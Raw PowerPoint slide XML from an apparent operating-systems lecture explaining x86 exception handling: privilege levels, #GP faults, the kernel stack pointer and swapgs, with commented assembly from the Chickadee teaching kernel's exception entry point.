                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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xEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37">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xEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5EE4C-B458-4E6E-B15D-E840594548C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6868583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9176F122-42B7-4A07-966A-6FCA2528BA74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932950" y="-60160"/>
            <a:ext cx="7243011" cy="1118937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Does x86 Do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D887E-2855-4692-AB16-0CF11CF20B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957008" y="874297"/>
            <a:ext cx="7243011" cy="1118937"/>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6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It reverses the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> last two steps!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1170245826"/>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x86</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41368C6-6EDD-49ED-94AB-05EE640605B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1997238" y="4507834"/>
            <a:ext cx="2418348" cy="2331513"/>
            <a:chOff x="1997238" y="4507834"/>
            <a:chExt cx="2418348" cy="2331513"/>
          </a:xfrm>
        </p:grpSpPr>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D6B5762-DC35-4999-8277-200CFFF9D14E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4936959" y="4501442"/>
            <a:ext cx="6829940" cy="2337906"/>
            <a:chOff x="4936959" y="4501442"/>
            <a:chExt cx="6829940" cy="2337906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Left Bracket 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1EA6FCA-E642-4618-AA91-E13B3470DBEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8125332"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6"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F880FD9D-1740-47C5-863D-620352CE1C8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4936959" y="4501442"/>
              <a:ext cx="4026570" cy="1657335"/>
              <a:chOff x="7776411" y="4501442"/>
              <a:chExt cx="4026570" cy="1657335"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="22" name="Group 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554EEBB1-469D-4388-B726-9F692BF1ED88}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7776411"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4"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F891DC11-920F-44F2-B579-D0DDACCBC30D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9348551" y="4507834"/>
              <a:ext cx="2418348" cy="1641547"/>
              <a:chOff x="4872791" y="4507834"/>
              <a:chExt cx="2418348" cy="1641547"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="35" name="Straight Arrow Connector 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEF4B5C-0992-47A5-84BB-720B9047A2E0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="13" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="6081964"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6B7CF5C-613A-4CD4-8154-7D1515FF00DA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4872791" y="4936193"/>
                <a:ext cx="2418348" cy="1213188"/>
                <a:chOff x="4872791" y="4936193"/>
                <a:chExt cx="2418348" cy="1213188"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="15" name="Group 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C4F192A-034B-460F-B843-E60EF222EAB3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4872791" y="4936193"/>
                  <a:ext cx="2418348" cy="872902"/>
                  <a:chOff x="3068051" y="4069921"/>
                  <a:chExt cx="2418348" cy="872902"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="13" name="TextBox 12">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8362D3-A49B-4E7B-926B-76AE25B9A4F2}"/>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14" name="TextBox 13">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4CD50C-61A0-43A7-A8EC-F3BB241C14A0}"/>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41" name="TextBox 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A04865-6BF5-478D-B5DB-50BE1C917C7E}"/>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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE2C68F-AB19-42D1-8070-36EE82EF4C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="316208" y="885114"/>
            <a:ext cx="6921984" cy="3874935"/>
            <a:chOff x="316208" y="885114"/>
            <a:chExt cx="6921984" cy="3874935"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Oval 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCE6134-F0B6-4CD0-BDB7-1D285F29E940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6689552" y="4211409"/>
              <a:ext cx="548640" cy="5486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D705F41-1411-4A10-9EE0-B5EFB0D423C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="316208" y="4022014"/>
              <a:ext cx="6653680" cy="73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EBB4AD-A9EC-4848-93E8-157837E72179}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="320625" y="897146"/>
              <a:ext cx="730377" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">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766E88-830C-40F9-85C2-EEB837035175}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="344689" y="885114"/>
              <a:ext cx="0" cy="3145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FD2C2BC-CFE3-420D-AD11-56DA3B61F7A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6963872" y="4008424"/>
              <a:ext cx="0" cy="199556"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="444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4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0A480C-F5AF-4A33-A1F3-9227338D5328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008646" y="685795"/>
            <a:ext cx="10647946" cy="3410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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> happens, the privilege level will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware will check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-time privilege level, see that it’s 0, and thus assume that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> already points to a kernel stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, the hardware will try to push the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exception state (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) onto the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, as if a normal nested exception were occurring . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14068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1F9E58E-4C5F-4078-BFCB-8CC242A83B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6889917"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12192000" cy="6889917"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{071A64F6-5BD0-4B31-B29A-698CD6D91B86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12192000" cy="6889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85A777-C81B-402F-9BF4-00148E80ADC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4320506" y="352245"/>
              <a:ext cx="7871494" cy="6153509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90C94C4-3654-408D-B94B-28EC2B25A903}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="120317" y="2695072"/>
              <a:ext cx="4182129" cy="4194845"/>
              <a:chOff x="120317" y="1179096"/>
              <a:chExt cx="5645531" cy="5662696"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB65F70-887F-49D0-8312-40A89F9A8531}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="120317" y="1751505"/>
                <a:ext cx="5502227" cy="3915538"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766D1DB4-869E-4C0C-9F49-B163FC3386F0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="120317" y="1179096"/>
                <a:ext cx="5645531" cy="56626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Arrow: Bent 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5376093C-255B-4EC9-894C-C899DFAF37C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1828800" y="965615"/>
              <a:ext cx="2473646" cy="1621174"/>
            </a:xfrm>
            <a:prstGeom prst="bentArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
                <a:gd name="adj4"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613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91A9B0-5AD3-427D-A2D0-71D997A9E0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172451" y="555301"/>
            <a:ext cx="13363075" cy="15973604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Chickadee: Exception entry point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//    Most exception handlers jump here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exception_entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    /* On entry, the stack looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       +-----------------------+ &lt;-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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_intno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_swapgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> |    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reg_errcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           |    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%rip                  |    16(%</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%cs                   |    24(%</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rflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               |    32(%</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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                  |    40(%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%ss                   |    48(%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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       This data should be stored on the current kernel task stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       It's already there if the exception happened in kernel mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       Otherwise, we must `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>swapgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` and move it there. */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    // Exception happened in user mode if `(%cs &amp; 3) != 0`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>testb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $3, 24(%</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jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exception_entry_finish</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orl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $1, 4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)                // tell resume to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
